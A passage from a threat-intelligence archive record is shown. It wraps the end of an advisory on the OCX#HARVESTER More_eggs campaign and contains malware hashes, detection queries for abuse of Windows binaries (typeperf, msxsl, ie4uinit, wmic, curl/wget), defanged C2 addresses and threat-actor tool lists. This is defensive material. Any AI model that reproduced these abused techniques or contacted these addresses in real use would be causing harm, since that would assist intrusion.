5eee027839ce7f97976af005c04ff5d22316eacd2cd880b95f6bdb09ee84fd5c\r\nTunner.OCX#HARVESTER (MathATL.dll)         debead9e8e3d106991e38d2057931265b3a08d4746c08255df0a4bf986327215\r\nBtaker.exe (SharpChrome.exe)               1f03769fc692886f1dbdf2a2cfe7be50e6cbe94fb364ca4a0f501e88bd1ccb3 (63 hex characters as published, so one character is missing)\r\nZUW0Y1NVRZ6LIIHFO2AQNHTX.txt / HU1NYTL2FCVX3JN63U0ASR1J3.txt  b9c08b08d5a97c93db572fe67fcee129a41235182d9a6be8164058da0969ece9\r\nQVB3WZXVQG6G8O7V.txt                       13275de2ee18d0b66772dec7ad5d1f2eb16875de8b33802793bcf4a5b41c7432\r\nKUCCGGD9PVKXKKRJUHN.txt                    6e90de5bf00945252fcfc3746446b5d1037af59bed67e6e33de1a5dae9616bf9\r\nRelevant Securonix detection 
policies\r\nEDR-ALL-1171-ERR\r\nEDR-ALL-1204-RU\r\nEDR-ALL-225-RU\r\nWEL-ALL-1155-RU\r\nEDR-ALL-1169-RU\r\nEDR-ALL-993-RU\r\nEDR-ALL-1168-RU\r\nEDR-ALL-1193-RU\r\nRelevant Spotter queries\r\ntypeperf.exe used as a sleep primitive:\r\nrg_functionality = \"Endpoint Management Systems\" AND (deviceaction = \"Process Create\" OR deviceaction = \"ProcessCreate\" OR deviceaction = \"Process Create (rule: ProcessCreate)\" OR deviceaction = \"ProcessRollup2\" OR deviceaction = \"SyntheticProcessRollUp2\" OR deviceaction = \"WmiCreateProcess\" OR deviceaction = \"Trace Executed Process\" OR deviceaction = \"Process\" OR deviceaction = \"Childproc\" OR deviceaction = \"Procstart\" OR deviceaction = \"Process Activity: Launched\") AND destinationprocessname ENDS WITH \"typeperf.exe\" AND resourcecustomfield1 CONTAINS \"\\system\\processor queue length\" AND resourcecustomfield1 CONTAINS \" -si \" AND resourcecustomfield1 CONTAINS \" -sc \"\r\nmsxsl.exe present in a user-writable directory or running under another process name:\r\nrg_functionality = \"Endpoint Management Systems\" AND (deviceaction = \"Process Create\" OR deviceaction = \"ProcessCreate\" OR deviceaction = \"Process Create (rule: ProcessCreate)\" OR deviceaction = \"ProcessRollup2\" OR deviceaction = \"SyntheticProcessRollUp2\" OR deviceaction = \"WmiCreateProcess\" OR deviceaction = \"Trace Executed Process\" OR deviceaction = \"Process\" OR deviceaction = \"Childproc\" OR deviceaction = \"Procstart\" OR deviceaction = \"Process Activity: Launched\") AND (destinationprocessname ENDS WITH \"msxsl.exe\" OR filename = \"msxsl.exe\") AND (resourcecustomfield8 CONTAINS \"\\Appdata\\Local\\\" OR resourcecustomfield8 CONTAINS \"\\Appdata\\Roaming\\\" OR resourcecustomfield8 CONTAINS \"\\ProgramData\\\" OR resourcecustomfield8 CONTAINS \"\\Users\\Public\\\" OR filename = \"msxsl.exe\") AND destinationprocessname NOT ENDS WITH \"msxsl.exe\"\r\nie4uinit.exe executed from outside System32/SysWOW64, or renamed:\r\nrg_functionality = \"Endpoint Management Systems\" AND (deviceaction = \"Process Create\" 
OR deviceaction = \"ProcessCreate\" OR deviceaction = \"Process Create (rule: ProcessCreate)\" OR deviceaction = \"ProcessRollup2\" OR deviceaction = \"SyntheticProcessRollUp2\" OR deviceaction = \"WmiCreateProcess\" OR deviceaction = \"Trace Executed Process\" OR deviceaction = \"Process\" OR deviceaction = \"Childproc\" OR deviceaction = \"Procstart\" OR deviceaction = \"Process Activity: Launched\") AND (((destinationprocessname ENDS WITH \"ie4uinit.exe\" OR filename = \"IE4UINIT.EXE\") AND resourcecustomfield8 NOT CONTAINS \"Windows\\System32\" AND resourcecustomfield8 NOT CONTAINS \"Windows\\SysWOW64\") OR (filename = \"IE4UINIT.EXE\" AND destinationprocessname NOT ENDS WITH \"ie4uinit.exe\"))\r\nwmic process call create used as a launcher:\r\nrg_functionality = \"Endpoint Management Systems\" AND (deviceaction = \"Process Create\" OR deviceaction = \"ProcessCreate\" OR deviceaction = \"Process Create (rule: ProcessCreate)\" OR deviceaction = \"ProcessRollup2\" OR deviceaction = \"SyntheticProcessRollUp2\" OR deviceaction = \"WmiCreateProcess\" OR deviceaction = \"Trace Executed Process\" OR deviceaction = \"Process\" OR deviceaction = \"Childproc\" OR deviceaction = \"Procstart\" OR deviceaction = \"Process Activity: Launched\") AND destinationprocessname ENDS WITH \"wmic.exe\" AND resourcecustomfield1 CONTAINS \"process\" AND resourcecustomfield1 CONTAINS \"call\" AND resourcecustomfield1 CONTAINS \"create\"\r\ncurl/wget moving image files over HTTP(S):\r\nrg_functionality = \"Endpoint Management Systems\" AND (destinationprocessname ENDS WITH \"curl.exe\" OR destinationprocessname ENDS WITH \"wget.exe\") AND (resourcecustomfield1 CONTAINS \".jpg\" OR resourcecustomfield1 CONTAINS \".jpeg\" OR resourcecustomfield1 CONTAINS \".png\") AND (resourcecustomfield1 CONTAINS \"http://\" OR resourcecustomfield1 CONTAINS \"https://\")\r\nNetwork connections to the known C2 addresses:\r\n(rg_functionality = \"Next Generation Firewall\" OR rg_functionality = \"Web Application Firewall\" OR rg_functionality = \"Web Proxy\") AND (destinationaddress = \"95.179.201[.]171\" OR destinationaddress = \"95.179.186[.]167\" OR destinationaddress = 
\"95.179.170[.]76\" OR destinationaddress = \"193.149.187[.]170\" OR destinationaddress = \"193.149.185[.]229\")\r\nReferences:\r\n[1] More_eggs, Anyone? Threat Actor ITG08 Strikes Again\r\nhttps://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/\r\n[2] Latest Golden Chickens MaaS Tools Updates and Observed Attacks\r\nhttps://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/\r\n[3] LOLBAS Project: Ie4uinit.exe\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/\r\n[4] LOLBAS Project: msxsl.exe\r\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/\r\n[5] GitHub: GhostPack – SharpDPAPI#sharpchrome\r\nhttps://github.com/GhostPack/SharpDPAPI#sharpchrome\r\n[6] Hackers Spearphish Professionals on LinkedIn with Fake Job Offers, Infecting them with Malware, Warns eSentire\r\nhttps://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire\r\nSource: https://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/"
	],
	"report_names": [
		"threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite"
	],
	"threat_actors": [
		{
			"id": "059b16f8-d4e0-4399-9add-18101a2fd298",
			"created_at": "2022-10-25T15:50:23.29434Z",
			"updated_at": "2026-04-10T02:00:05.380938Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"Evilnum"
			],
			"source_name": "MITRE:Evilnum",
			"tools": [
				"More_eggs",
				"EVILNUM",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "12517c87-040a-4627-a3df-86ca95e5c13f",
			"created_at": "2022-10-25T16:07:23.61665Z",
			"updated_at": "2026-04-10T02:00:04.689Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"ATK 88",
				"Camouflage Tempest",
				"FIN6",
				"G0037",
				"Gold Franklin",
				"ITG08",
				"Skeleton Spider",
				"Storm-0538",
				"TAAL",
				"TAG-CR2",
				"White Giant"
			],
			"source_name": "ETDA:FIN6",
			"tools": [
				"AbaddonPOS",
				"Agentemis",
				"AmmyyRAT",
				"Anchor_DNS",
				"BlackPOS",
				"CmdSQL",
				"Cobalt Strike",
				"CobaltStrike",
				"FlawedAmmyy",
				"FrameworkPOS",
				"Grateful POS",
				"JSPSPY",
				"Kaptoxa",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LockerGoga",
				"MMon",
				"Magecart",
				"Meterpreter",
				"Mimikatz",
				"More_eggs",
				"NeverQuest",
				"POSWDS",
				"Reedum",
				"Ryuk",
				"SCRAPMINT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Terra Loader",
				"TerraStealer",
				"Vawtrak",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"cobeacon",
				"grabnew"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f5c90ccc-0f18-4e07-a246-b62101ab2f6f",
			"created_at": "2023-01-06T13:46:38.854407Z",
			"updated_at": "2026-04-10T02:00:03.122844Z",
			"deleted_at": null,
			"main_name": "GC02",
			"aliases": [
				"Golden Chickens",
				"Golden Chickens02",
				"Golden Chickens 02"
			],
			"source_name": "MISPGALAXY:GC02",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "81dde5cc-c29f-430d-8c6e-e5e92d5015e7",
			"created_at": "2022-10-25T16:07:23.704358Z",
			"updated_at": "2026-04-10T02:00:04.718034Z",
			"deleted_at": null,
			"main_name": "Harvester",
			"aliases": [],
			"source_name": "ETDA:Harvester",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Graphon",
				"Metasploit",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9",
			"created_at": "2022-10-25T15:50:23.317961Z",
			"updated_at": "2026-04-10T02:00:05.280403Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"FIN6",
				"Magecart Group 6",
				"ITG08",
				"Skeleton Spider",
				"TAAL",
				"Camouflage Tempest"
			],
			"source_name": "MITRE:FIN6",
			"tools": [
				"FlawedAmmyy",
				"GrimAgent",
				"FrameworkPOS",
				"More_eggs",
				"Cobalt Strike",
				"Windows Credential Editor",
				"AdFind",
				"PsExec",
				"LockerGoga",
				"Ryuk",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e",
			"created_at": "2024-06-19T02:03:08.052814Z",
			"updated_at": "2026-04-10T02:00:03.659971Z",
			"deleted_at": null,
			"main_name": "GOLD FRANKLIN",
			"aliases": [
				"FIN6 ",
				"ITG08 ",
				"MageCart Group 6 ",
				"Skeleton Spider ",
				"Storm-0538 ",
				"White Giant "
			],
			"source_name": "Secureworks:GOLD FRANKLIN",
			"tools": [
				"FrameWorkPOS",
				"Metasploit",
				"Meterpreter",
				"Mimikatz",
				"PowerSploit",
				"PowerUpSQL",
				"RemCom"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "88802a4b-5b3d-42ee-99e6-8a4f5fd231f6",
			"created_at": "2023-01-06T13:46:38.851345Z",
			"updated_at": "2026-04-10T02:00:03.121861Z",
			"deleted_at": null,
			"main_name": "GC01",
			"aliases": [
				"Golden Chickens",
				"Golden Chickens01",
				"Golden Chickens 01"
			],
			"source_name": "MISPGALAXY:GC01",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2dfaa730-7079-494c-b2f0-3ff8f3598a51",
			"created_at": "2022-10-25T16:07:23.474746Z",
			"updated_at": "2026-04-10T02:00:04.623746Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"ATK 67",
				"Cobalt Gang",
				"Cobalt Spider",
				"G0080",
				"Gold Kingswood",
				"Mule Libra",
				"TAG-CR3"
			],
			"source_name": "ETDA:Cobalt Group",
			"tools": [
				"ATMRipper",
				"ATMSpitter",
				"Agentemis",
				"AmmyyRAT",
				"AtNow",
				"COOLPANTS",
				"CobInt",
				"Cobalt Strike",
				"CobaltStrike",
				"Cyst Downloader",
				"Fareit",
				"FlawedAmmyy",
				"Formbook",
				"Little Pig",
				"Metasploit Stager",
				"Mimikatz",
				"More_eggs",
				"NSIS",
				"Nullsoft Scriptable Install System",
				"Pony Loader",
				"Ripper ATM",
				"SDelete",
				"Siplog",
				"SoftPerfect Network Scanner",
				"SpicyOmelette",
				"Taurus Builder",
				"Taurus Builder Kit",
				"Taurus Loader",
				"Terra Loader",
				"ThreatKit",
				"VenomKit",
				"cobeacon",
				"win.xloader"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8ce861d7-7fbd-4d9c-a211-367c118bfdbd",
			"created_at": "2023-01-06T13:46:39.153487Z",
			"updated_at": "2026-04-10T02:00:03.232006Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"EvilNum",
				"Jointworm",
				"KNOCKOUT SPIDER",
				"DeathStalker",
				"TA4563"
			],
			"source_name": "MISPGALAXY:Evilnum",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ee3363a4-e807-4f95-97d8-b603c31b9de1",
			"created_at": "2023-01-06T13:46:38.485884Z",
			"updated_at": "2026-04-10T02:00:02.99385Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"SKELETON SPIDER",
				"ITG08",
				"MageCart Group 6",
				"ATK88",
				"TA4557",
				"Storm-0538",
				"White Giant",
				"GOLD FRANKLIN",
				"G0037",
				"Camouflage Tempest"
			],
			"source_name": "MISPGALAXY:FIN6",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "39ea99fb-1704-445d-b5cd-81e7c99d6012",
			"created_at": "2022-10-25T16:07:23.601894Z",
			"updated_at": "2026-04-10T02:00:04.684134Z",
			"deleted_at": null,
			"main_name": "Evilnum",
			"aliases": [
				"G0120",
				"Jointworm",
				"Operation Phantom in the [Command] Shell",
				"TA4563"
			],
			"source_name": "ETDA:Evilnum",
			"tools": [
				"Bypass-UAC",
				"Cardinal RAT",
				"ChromeCookiesView",
				"EVILNUM",
				"Evilnum",
				"IronPython",
				"LaZagne",
				"MailPassView",
				"More_eggs",
				"ProduKey",
				"PyVil",
				"PyVil RAT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Taurus Loader TeamViewer Module",
				"Terra Loader",
				"TerraPreter",
				"TerraStealer",
				"TerraTV"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c11abba0-f5e8-4017-a4ee-acb1a7c8c242",
			"created_at": "2022-10-25T15:50:23.744036Z",
			"updated_at": "2026-04-10T02:00:05.294413Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"Cobalt Group",
				"GOLD KINGSWOOD",
				"Cobalt Gang",
				"Cobalt Spider"
			],
			"source_name": "MITRE:Cobalt Group",
			"tools": [
				"Mimikatz",
				"More_eggs",
				"SpicyOmelette",
				"SDelete",
				"Cobalt Strike",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "7a257844-df90-4bd4-b0f1-77d00ff82802",
			"created_at": "2022-10-25T16:07:24.376356Z",
			"updated_at": "2026-04-10T02:00:04.964565Z",
			"deleted_at": null,
			"main_name": "Venom Spider",
			"aliases": [
				"Golden Chickens",
				"TA4557",
				"Venom Spider"
			],
			"source_name": "ETDA:Venom Spider",
			"tools": [
				"More_eggs",
				"PureLocker",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Builder",
				"Taurus Builder Kit",
				"Taurus Loader",
				"Taurus Loader Reconnaissance Module",
				"Taurus Loader Stealer Module",
				"Taurus Loader TeamViewer Module",
				"Terra Loader",
				"TerraCrypt",
				"TerraLogger",
				"TerraPreter",
				"TerraRecon",
				"TerraStealer",
				"TerraTV",
				"TerraWiper",
				"ThreatKit",
				"VenomKit",
				"VenomLNK",
				"lite_more_eggs"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434484,
	"ts_updated_at": 1775792168,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0795455275faf6b5dfed815cbd61d40a6cd88595.pdf",
		"text": "https://archive.orkl.eu/0795455275faf6b5dfed815cbd61d40a6cd88595.txt",
		"img": "https://archive.orkl.eu/0795455275faf6b5dfed815cbd61d40a6cd88595.jpg"
	}
}